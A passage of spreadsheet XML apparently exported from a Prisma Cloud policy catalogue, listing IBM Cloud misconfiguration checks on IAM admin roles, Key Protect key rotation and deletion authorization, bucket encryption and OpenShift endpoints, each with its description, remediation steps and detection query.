          <t>5b46e8e7-e33b-46df-bfbb-86ef86be824b</t>
        </is>
      </c>
      <c r="AJ3325" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3325" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3326">
      <c r="A3326" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, HIPAA, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, Telecommunications Security Act - TSA, TX-RAMP Level 2, ITSG-33, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, SOC 2, SOC 2, TX-RAMP Level 1, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3326" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3326" s="2" t="inlineStr"/>
      <c r="D3326" t="inlineStr"/>
      <c r="E3326" t="inlineStr"/>
      <c r="F3326" t="inlineStr"/>
      <c r="G3326" t="b">
        <v>1</v>
      </c>
      <c r="H33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6" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3326" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3326" t="inlineStr">
        <is>
          <t>IBM Cloud user with IAM policies provide administrative privileges for Kubernetes Service</t>
        </is>
      </c>
      <c r="L3326" t="inlineStr"/>
      <c r="M3326" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3326" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3326" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3326" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3326" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R3326" t="inlineStr">
        <is>
          <t>Account Management | Privileged User Accounts</t>
        </is>
      </c>
      <c r="S3326" t="inlineStr"/>
      <c r="T3326" t="b">
        <v>0</v>
      </c>
      <c r="U3326" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3326" t="inlineStr">
        <is>
          <t>ibm-iam-policy</t>
        </is>
      </c>
      <c r="W3326" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud users with overly permissive Kubernetes Administrative role. When a user having policy with admin rights gets compromised, the whole service gets compromised. As a security best practice, it is recommended to grant the least privilege access, such as granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3326" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. In the IBM Cloud console, click 'Manage' on the title bar &gt; 'Access (IAM)', click on 'Users' in the left panel.
3. Select the user which is reported and you want to edit access for.
4. Go to 'Access' tab and under the 'Access policies' section, click on three dots on the right corner of a row for the policy which is having Administrator permission on 'Kubernetes Service'.
5. Click on Remove OR Edit to assign limited permission to the policy.
6. Review the policy details that you're about to Edit/Remove, and confirm by clicking Save/Remove</t>
        </is>
      </c>
      <c r="Y3326" t="inlineStr"/>
      <c r="Z3326" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'ibm-iam-policy' AND json.rule = type equal ignore case "access" and roles[?any( role_id contains "crn:v1:bluemix:public:iam::::role:Administrator" )] exists and resources[?any( attributes[?any( name equal ignore case "serviceName" and value equal ignore case "containers-kubernetes" and operator is member of ("stringEquals", "stringMatch"))] exists and attributes[?any( name is member of ("region","resource","resourceGroupId","resourceType","serviceInstance","namespace"))] does not exist )] exists and subjects[?any( attributes[?any( name contains "iam_id" and value contains "IBMid")] exists )] exists as X;config from cloud.resource where api.name = 'ibm-iam-user' as Y; filter '$.X.subjects[*].attributes[*].value contains $.Y.iam_id'; show Y;</t>
        </is>
      </c>
      <c r="AA3326" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3326" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3326" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-1022</t>
        </is>
      </c>
      <c r="AD3326" t="b">
        <v>1</v>
      </c>
      <c r="AE3326" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3326" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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6" t="inlineStr">
        <is>
          <t>17f1595d-c94b-48d7-a7f0-a206fc11daea</t>
        </is>
      </c>
      <c r="AI3326" t="inlineStr">
        <is>
          <t>bf6567fa-46b6-47be-81cb-731a7ff756d6</t>
        </is>
      </c>
      <c r="AJ3326" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3326" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3327">
      <c r="A3327" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, TX-RAMP Level 2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ITSG-33, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B3327" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3327" s="2" t="inlineStr"/>
      <c r="D3327" t="inlineStr"/>
      <c r="E3327" t="inlineStr"/>
      <c r="F3327" t="inlineStr"/>
      <c r="G3327" t="b">
        <v>0</v>
      </c>
      <c r="H33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7" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3327" t="inlineStr">
        <is>
          <t>ibm-key</t>
        </is>
      </c>
      <c r="K3327" t="inlineStr">
        <is>
          <t>IBM Cloud Key Protect root key have aged more than 90 days without being rotated</t>
        </is>
      </c>
      <c r="L3327" t="inlineStr"/>
      <c r="M3327" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3327" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3327" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3327" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3327" t="inlineStr">
        <is>
          <t>TA0005</t>
        </is>
      </c>
      <c r="R3327" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0005)</t>
        </is>
      </c>
      <c r="S3327" t="inlineStr"/>
      <c r="T3327" t="b">
        <v>0</v>
      </c>
      <c r="U3327" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3327" t="inlineStr">
        <is>
          <t>ibm-key-protect-key</t>
        </is>
      </c>
      <c r="W3327" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Key Protect root keys that have aged more than 90 days without being rotated. It is a procedure that adheres to security best practices to rotate keys on a regular basis. So that if the keys are compromised, the data in the underlying service is still secure with the new keys.</t>
        </is>
      </c>
      <c r="X3327" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. Click on Menu Icon and navigate to 'Resource list', From the list of resources, select your provisioned instance of Key Protect in which the reported root key resides.
3. Select the key and click on three dots on the right corner of the row to open the list of options for the key that you want to rotate.
4. Click on 'Rotate'.
5. In the 'Rotation' window, click on 'Rotate Key' 
6. In order to set the rotation policy, Under 'Manage rotation policy', enable 'Rotation policy' checkbox and select the day intervals for the key rotation as per the requirement.
7. Click on 'Set policy' button to establish this policy.</t>
        </is>
      </c>
      <c r="Y3327" t="inlineStr"/>
      <c r="Z3327" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-key-protect-key' AND json.rule = 'extractable is false and state equals 1 and ((lastRotateDate does not exist and _DateTime.ageInDays(creationDate) &gt; 90 ) or _DateTime.ageInDays(lastRotateDate) &gt; 90)'</t>
        </is>
      </c>
      <c r="AA3327" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3327" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3327" t="inlineStr">
        <is>
          <t>PC-IBM-IKP-1008</t>
        </is>
      </c>
      <c r="AD3327" t="b">
        <v>1</v>
      </c>
      <c r="AE3327" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3327" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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7" t="inlineStr">
        <is>
          <t>ee32f6af-17d9-4c7e-abc1-733a5908f449</t>
        </is>
      </c>
      <c r="AI3327" t="inlineStr">
        <is>
          <t>ff95d05c-3656-4692-8f73-6b307bafa760</t>
        </is>
      </c>
      <c r="AJ3327" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3327" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3328">
      <c r="A3328" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HIPAA, GDPR, DORA, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, SOC 2, HIPAA, HIPAA, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ITSG-33, TX-RAMP Level 1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, SOC 2, HIPAA</t>
        </is>
      </c>
      <c r="B3328" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3328" s="2" t="inlineStr"/>
      <c r="D3328" t="inlineStr"/>
      <c r="E3328" t="inlineStr"/>
      <c r="F3328" t="inlineStr"/>
      <c r="G3328" t="b">
        <v>0</v>
      </c>
      <c r="H33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8" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3328" t="inlineStr">
        <is>
          <t>ibm-key</t>
        </is>
      </c>
      <c r="K3328" t="inlineStr">
        <is>
          <t>IBM Cloud Key Protect Key dual authorization for deletion is not enabled</t>
        </is>
      </c>
      <c r="L3328" t="inlineStr"/>
      <c r="M3328" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3328" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3328" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3328" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3328" t="inlineStr">
        <is>
          <t>164.312(c)</t>
        </is>
      </c>
      <c r="R3328" t="inlineStr">
        <is>
          <t>164.312(c)(2)</t>
        </is>
      </c>
      <c r="S3328" t="inlineStr"/>
      <c r="T3328" t="b">
        <v>0</v>
      </c>
      <c r="U3328" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3328" t="inlineStr">
        <is>
          <t>ibm-key-protect-key</t>
        </is>
      </c>
      <c r="W3328" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Key Protect Key that has dual authorization for deletion is disabled. Dual authorization for Key Protect service instances is an extra policy that helps to prevent accidental or malicious deletion of keys in your Key Protect instance. It is recommended that dual authorization for deletion of all keys in a Key Protect instance is enabled.</t>
        </is>
      </c>
      <c r="X3328" t="inlineStr">
        <is>
          <t>1. Login to IBM Cloud CLI
2. For setting up the IBM cloud CLI for Key Protect, please refer to the below URL: 
https://cloud.ibm.com/docs/key-protect?topic=key-protect-set-up-cli#install-cli
3. To change the region where the reported Key Protect instance is located, run the following IBM cloud CLI command:
ibmcloud target -r &lt;TARGET_INSTANCE_REGION&gt; 
4. To enable dual authorization policy for your Key Protect instance key, run the following IBM cloud CLI command:
ibmcloud kp key policy-update dual-auth-delete &lt;Reported KeyID or KEY_ALIAS&gt; --enable --instance-id &lt;TARGET_INSTANCE_ID where the reported key is present&gt;
Reference: https://cloud.ibm.com/docs/key-protect?topic=key-protect-key-protect-cli-reference#kp-key-policy-update-dual
 5. To enable dual authorization settings at the instance level, Please refer to the below URL.
https://cloud.ibm.com/docs/key-protect?topic=key-protect-manage-dual-auth</t>
        </is>
      </c>
      <c r="Y3328" t="inlineStr"/>
      <c r="Z3328" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-key-protect-key' AND json.rule = dualAuthDelete does not exist or dualAuthDelete.enabled is false</t>
        </is>
      </c>
      <c r="AA3328" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3328" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3328" t="inlineStr">
        <is>
          <t>PC-IBM-IKP-1009</t>
        </is>
      </c>
      <c r="AD3328" t="b">
        <v>1</v>
      </c>
      <c r="AE3328" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3328" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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8" t="inlineStr">
        <is>
          <t>bc8f6500-5948-438f-8c70-68a5d04d16af</t>
        </is>
      </c>
      <c r="AI3328" t="inlineStr">
        <is>
          <t>c5695af7-5ab9-47b1-b77c-3e7406dd6f3a</t>
        </is>
      </c>
      <c r="AJ3328" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3328" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3329">
      <c r="A3329" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, CIS v1.1.0 (IBM Cloud) Level 2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, DORA, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, SOC 2, ISO/IEC 27001:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B3329" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3329" s="2" t="inlineStr"/>
      <c r="D3329" t="inlineStr"/>
      <c r="E3329" t="inlineStr"/>
      <c r="F3329" t="inlineStr"/>
      <c r="G3329" t="b">
        <v>0</v>
      </c>
      <c r="H332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29" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3329" t="inlineStr">
        <is>
          <t>ibm-key</t>
        </is>
      </c>
      <c r="K3329" t="inlineStr">
        <is>
          <t>IBM Cloud Key Protect root key automatic key rotation is not enabled</t>
        </is>
      </c>
      <c r="L3329" t="inlineStr"/>
      <c r="M3329" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3329" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3329" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3329" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3329" t="inlineStr">
        <is>
          <t>TA0004</t>
        </is>
      </c>
      <c r="R3329" t="inlineStr">
        <is>
          <t>T1098 - Account Manipulation (TA0004)</t>
        </is>
      </c>
      <c r="S3329" t="inlineStr"/>
      <c r="T3329" t="b">
        <v>0</v>
      </c>
      <c r="U3329" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3329" t="inlineStr">
        <is>
          <t>ibm-key-protect-key</t>
        </is>
      </c>
      <c r="W3329" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Key Protect root keys that are not enabled with automatic key rotation. As a security best practice, it is important to rotate the keys periodically. So that if the keys are compromised, the data in the underlying service is still secure with the new keys.</t>
        </is>
      </c>
      <c r="X3329" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud console.
2. Click on Menu Icon and navigate to 'Resource list', From the list of resources, under security section, select your provisioned instance of Key Protect, in which the reported root key resides.
3. Select the key and click on the three dots on the right corner of the row to open the list of options for the key for which you want to set the rotation policy.
4. Click on 'Rotate'
5. In order to set the rotation policy, Under 'Manage rotation policy' section, enable the 'Rotation policy' checkbox and select the day intervals for the key rotation as per the requirement.
6. Click on the 'Set policy' button to establish this policy.</t>
        </is>
      </c>
      <c r="Y3329" t="inlineStr"/>
      <c r="Z3329" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-key-protect-key' AND json.rule = extractable is false and state equals 1 and ((policy[*].rotation exists and policy[*].rotation.enabled is false ) or policy[*].rotation does not exist)</t>
        </is>
      </c>
      <c r="AA3329" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3329" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3329" t="inlineStr">
        <is>
          <t>PC-IBM-IKP-1016</t>
        </is>
      </c>
      <c r="AD3329" t="b">
        <v>1</v>
      </c>
      <c r="AE3329" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3329" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG332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29" t="inlineStr">
        <is>
          <t>23be7e46-7a97-4cc5-8d1f-cf3bc9118cff</t>
        </is>
      </c>
      <c r="AI3329" t="inlineStr">
        <is>
          <t>01834039-e4b6-4643-b7b0-4f7be3fbe9e0</t>
        </is>
      </c>
      <c r="AJ3329" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3329" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3330">
      <c r="A3330" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, ISO/IEC 27001:2022, HITRUST CSF v.11.2.0, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, DORA, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27001:2022, CIS v1.1.0 (IBM Cloud) Level 2, ITSG-33, SOC 2, GDPR, HIPAA, SOC 2, NYDFS 23 CRR-NY 500.0, TX-RAMP Level 2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3330" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3330" s="2" t="inlineStr"/>
      <c r="D3330" t="inlineStr"/>
      <c r="E3330" t="inlineStr"/>
      <c r="F3330" t="inlineStr"/>
      <c r="G3330" t="b">
        <v>1</v>
      </c>
      <c r="H333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0" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3330" t="inlineStr">
        <is>
          <t>ibm-key</t>
        </is>
      </c>
      <c r="K3330" t="inlineStr">
        <is>
          <t>IBM Cloud Object Storage bucket is not encrypted with BYOK (bring your own key)</t>
        </is>
      </c>
      <c r="L3330" t="inlineStr"/>
      <c r="M3330" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3330" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3330" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3330" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3330" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R3330" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S3330" t="inlineStr"/>
      <c r="T3330" t="b">
        <v>0</v>
      </c>
      <c r="U3330" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3330" t="inlineStr">
        <is>
          <t>ibm-key-protect-registration</t>
        </is>
      </c>
      <c r="W3330" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Storage buckets that are not encrypted with BYOK (Bring your own key). Bring your Own Key (BYOK) allows customers to ensure no one outside their organisation has access to the root key and with the support of BYOK, customers can manage the lifecycle of their customer root keys where they can create, rotate, delete those keys. As a security best practice, it is recommended to use BYOK encryption key management system, which provides a significant level of control on the keys when used for encryption.</t>
        </is>
      </c>
      <c r="X3330" t="inlineStr">
        <is>
          <t>IBM Cloud object storage bucket can be encrypted with Bring your own key (BYOK) only at the time of creation. 
Please create a bucket with bring your own key encryption along with other required configuration as required using the below URL:
https://cloud.ibm.com/docs/cloud-object-storage?topic=cloud-object-storage-tutorial-kp-encrypt-bucket#kp-encrypt-bucket-create
Once the new bucket is created, Please transfer existing bucket objects to the new bucket with proper encryption configured using the below URL:
https://cloud.ibm.com/docs/cloud-object-storage?topic=cloud-object-storage-region-copy
To delete the alerted bucket, please follow the below instructions:
1. Log in to the IBM Cloud Console
2. Click on the 'Navigation Menu' icon and navigate to 'Resource list'. Under the 'Storage' section, select the object storage instance in which the reported bucket resides.
3. For the alerted bucket, select the 'Delete bucket' option from the kebab menu.
4. In the 'Delete Bucket' dialog, select 'Delete bucket'.</t>
        </is>
      </c>
      <c r="Y3330" t="inlineStr"/>
      <c r="Z3330" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'ibm-key-protect-registration' as X; config from cloud.resource where api.name = 'ibm-object-storage-bucket' AND json.rule = not( locationConstraint contains "ams03" or locationConstraint contains "mon01" or locationConstraint contains "tor01" or locationConstraint contains "sjc03" or locationConstraint contains "sjc04" or locationConstraint contains "sao01" or locationConstraint contains "mil01" or locationConstraint contains "sng01" or locationConstraint contains "che01" ) as Y; filter 'not($.X.resourceCrn equals $.Y.crn)'; show Y;</t>
        </is>
      </c>
      <c r="AA3330" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3330" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3330" t="inlineStr">
        <is>
          <t>PC-IBM-IBJ-1027</t>
        </is>
      </c>
      <c r="AD3330" t="b">
        <v>1</v>
      </c>
      <c r="AE3330" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3330" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG333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0" t="inlineStr">
        <is>
          <t>701ebb6d-5fd6-4077-986c-24d9b5e81091</t>
        </is>
      </c>
      <c r="AI3330" t="inlineStr">
        <is>
          <t>23ef6877-9b5c-478f-8597-4e284c84e8d8</t>
        </is>
      </c>
      <c r="AJ3330" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3330" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3331">
      <c r="A3331" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India</t>
        </is>
      </c>
      <c r="B3331" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3331" s="2" t="inlineStr"/>
      <c r="D3331" t="inlineStr"/>
      <c r="E3331" t="inlineStr"/>
      <c r="F3331" t="inlineStr"/>
      <c r="G3331" t="b">
        <v>1</v>
      </c>
      <c r="H333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1" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3331" t="inlineStr">
        <is>
          <t>ibm-kubernetes</t>
        </is>
      </c>
      <c r="K3331" t="inlineStr">
        <is>
          <t>IBM Cloud OpenShift cluster has Image pull secrets disabled</t>
        </is>
      </c>
      <c r="L3331" t="inlineStr"/>
      <c r="M3331" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3331" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3331" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3331" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3331" t="inlineStr">
        <is>
          <t>Security Domain Policies</t>
        </is>
      </c>
      <c r="R3331" t="inlineStr">
        <is>
          <t>Cloud Security Policy</t>
        </is>
      </c>
      <c r="S3331" t="inlineStr"/>
      <c r="T3331" t="b">
        <v>0</v>
      </c>
      <c r="U3331" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3331" t="inlineStr">
        <is>
          <t>ibm-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W3331" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud OpenShift Clusters with image pull secrets disabled. If Image pull secrets feature Is disabled, it stores registry credentials to connect to container registry. It is recommended to enable image pull secrets feature, which will store an image pull secret for pulling images rather than using credentials.</t>
        </is>
      </c>
      <c r="X3331" t="inlineStr">
        <is>
          <t>To enable image pull secrets feature on a OpenShift cluster, refer 
following URLs:
https://cloud.ibm.com/docs/openshift?topic=openshift-registry#imagePullSecret_migrate_api_key
https://cloud.ibm.com/docs/openshift?topic=openshift-registry#update-pull-secret</t>
        </is>
      </c>
      <c r="Y3331" t="inlineStr"/>
      <c r="Z3331" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-kubernetes-cluster' AND json.rule = type equal ignore case openshift and state equal ignore case normal and features.pullSecretApplied is false</t>
        </is>
      </c>
      <c r="AA3331" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3331" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3331" t="inlineStr">
        <is>
          <t>PC-IBM-KBN-986</t>
        </is>
      </c>
      <c r="AD3331" t="b">
        <v>1</v>
      </c>
      <c r="AE3331" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3331" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG333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1" t="inlineStr">
        <is>
          <t>88701197-be64-4e89-b945-cc2d53f8daf6</t>
        </is>
      </c>
      <c r="AI3331" t="inlineStr">
        <is>
          <t>601d8ecb-75d4-480b-8775-f14483d486be</t>
        </is>
      </c>
      <c r="AJ3331" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3331" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3332">
      <c r="A3332" t="inlineStr">
        <is>
          <t>HITRUST CSF v.11.2.0, TX-RAMP Level 2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CIS v1.1.0 (IBM Cloud) Level 1</t>
        </is>
      </c>
      <c r="B3332" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3332" s="2" t="inlineStr"/>
      <c r="D3332" t="inlineStr"/>
      <c r="E3332" t="inlineStr"/>
      <c r="F3332" t="inlineStr"/>
      <c r="G3332" t="b">
        <v>1</v>
      </c>
      <c r="H333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2" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3332" t="inlineStr">
        <is>
          <t>ibm-kubernetes</t>
        </is>
      </c>
      <c r="K3332" t="inlineStr">
        <is>
          <t>IBM Cloud OpenShift cluster is accessible by using public endpoint</t>
        </is>
      </c>
      <c r="L3332" t="inlineStr"/>
      <c r="M3332" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3332" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3332" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3332" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3332" t="inlineStr">
        <is>
          <t>Containers</t>
        </is>
      </c>
      <c r="R3332" t="inlineStr">
        <is>
          <t>7.1.4</t>
        </is>
      </c>
      <c r="S3332" t="inlineStr"/>
      <c r="T3332" t="b">
        <v>0</v>
      </c>
      <c r="U3332" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3332" t="inlineStr">
        <is>
          <t>ibm-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W3332" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud OpenShift clusters which has public service endpoint enabled. If any cluster has public service endpoint enabled, the cluster will be accessible from Internet routable IP address. It is highly recommended to use a private service endpoint instead of a public service endpoint.</t>
        </is>
      </c>
      <c r="X3332" t="inlineStr">
        <is>
          <t>An OpenShift cluster can be made private only at the time of creation. To create a private 
OpenShift cluster follow below URL:
https://cloud.ibm.com/docs/openshift?topic=openshift-cluster-create-vpc-gen2&amp;interface=ui#clusters_vpcg2_ui Please make sure to select 'Private endpoint only' at 'Master service endpoint' section.</t>
        </is>
      </c>
      <c r="Y3332" t="inlineStr"/>
      <c r="Z3332" t="inlineStr">
        <is>
